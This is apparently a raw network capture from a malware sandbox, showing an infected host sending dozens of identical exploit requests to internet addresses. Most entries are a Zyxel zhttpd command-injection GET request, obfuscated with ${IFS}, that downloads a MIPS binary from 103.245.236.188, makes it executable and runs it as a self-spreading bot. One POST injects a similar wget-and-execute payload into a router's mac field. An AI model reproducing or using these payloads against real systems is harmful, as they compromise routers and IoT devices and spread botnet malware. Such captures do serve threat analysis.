                                    Jan 13, 2024 19:02:52.613455057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9138192.168.2.1339148196.244.218.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613513947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9139192.168.2.135927666.149.61.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613585949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9140192.168.2.1340598126.190.63.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613619089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9141192.168.2.1351952106.43.175.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613656998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9142192.168.2.1348880169.122.63.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613713980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9143192.168.2.135544081.243.193.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613769054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9144192.168.2.135432274.247.238.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613806009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9145192.168.2.135730446.190.151.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613873959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9146192.168.2.1335524105.198.113.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613915920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9147192.168.2.1335074103.174.240.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.613970995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9148192.168.2.133579084.34.234.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614023924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9149192.168.2.1357822110.236.36.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614061117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9150192.168.2.133632299.42.201.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614100933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9151192.168.2.1356218169.95.119.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614176989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9152192.168.2.1342014174.196.86.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614243031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9153192.168.2.1335752145.29.98.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614304066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9154192.168.2.136020417.64.184.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614352942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9155192.168.2.136080219.224.84.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614391088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9156192.168.2.1354442188.12.4.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614470959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9157192.168.2.135825832.46.3.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.614516973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9158192.168.2.134321627.237.142.1588080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.499727964 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:53.791975021 CET103INHTTP/1.1 404 Not Found
                                    Content-Type: text/plain
                                    Content-Length: 30
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9159192.168.2.1350808156.162.206.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.633452892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9160192.168.2.1360572148.215.218.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.633527040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9161192.168.2.1359926221.193.94.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.633591890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9162192.168.2.134113880.42.150.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634010077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9163192.168.2.135237691.214.102.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634064913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9164192.168.2.1340376203.163.225.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634111881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9165192.168.2.135327499.142.203.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634193897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9166192.168.2.134694213.96.189.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634253025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9167192.168.2.1340152202.214.250.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634341955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9168192.168.2.135450631.57.197.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634371996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9169192.168.2.135769684.182.94.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634439945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9170192.168.2.1337514135.68.156.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634499073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9171192.168.2.1358084116.157.251.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634535074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9172192.168.2.13485404.74.249.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634587049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9173192.168.2.1352214153.187.48.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634641886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9174192.168.2.134420641.194.25.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634705067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9175192.168.2.1338470177.109.64.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634777069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9176192.168.2.134992284.167.209.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634833097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9177192.168.2.1357722105.37.244.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634874105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9178192.168.2.1340296202.179.219.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634937048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9179192.168.2.1347474146.180.47.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.634983063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9180192.168.2.1338130184.234.123.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635015011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9181192.168.2.1353120190.164.79.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635065079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9182192.168.2.134444648.19.205.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635122061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9183192.168.2.1333680186.189.154.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635171890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9184192.168.2.1357902131.143.149.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635242939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9185192.168.2.1334488203.132.217.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635293007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9186192.168.2.134044876.7.58.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635355949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9187192.168.2.135641839.136.81.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635413885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9188192.168.2.135959642.78.41.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635458946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9189192.168.2.1341732123.54.181.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635544062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9190192.168.2.133454425.214.248.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635608912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9191192.168.2.133606477.35.109.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635653019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9192192.168.2.134905894.132.14.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635711908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9193192.168.2.134988844.180.130.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635766983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9194192.168.2.1337730101.246.218.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635812044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9195192.168.2.133721819.120.96.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635891914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9196192.168.2.134122651.144.221.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.635946035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9197192.168.2.1353534222.160.190.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636001110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9198192.168.2.133903088.48.232.175443
                                    TimestampBytes transferredDirectionData
